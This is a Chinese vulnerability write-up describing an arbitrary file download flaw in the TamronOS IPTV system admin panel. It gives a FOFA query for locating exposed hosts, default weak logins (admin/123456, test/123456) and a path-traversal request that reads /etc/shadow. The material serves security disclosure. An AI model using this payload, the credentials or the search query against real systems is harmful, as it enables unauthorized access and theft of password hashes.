menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right TamronOS IPTV系统后台任意文件下载 chevron_right TamronOS IPTV系统后台任意文件下载.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    TamronOS IPTV系统后台任意文件下载.md
    684 B / 2021-07-15 20:04:47
        ## TamronOS IPTV系统后台任意文件下载

## 漏洞描述

TamronOS IPTV系统存在任意文件下载

## 漏洞影响

> TamronOS IPTV V5 3.6.6

## FOFA

> title="TamronOS IPTV系统"

## POC

1)登录界面

![1](/resource/TamronOS-IPTV/1.png) 

2)该系统默认弱口令admin/123456,登录后的界面如下也可以试试test/123456

![2](/resource/TamronOS-IPTV/2.png)

4)存在下载的地方,下载抓包

![3](/resource/TamronOS-IPTV/3.png)

 ![4](/resource/TamronOS-IPTV/4.png)

修改参数,读取文件成功POC如下 

```
GET /download/backup?name=./../../../../../etc/shadow
```

![5](/resource/TamronOS-IPTV/5.png)

![6](/resource/TamronOS-IPTV/6.png)
    links
    file_download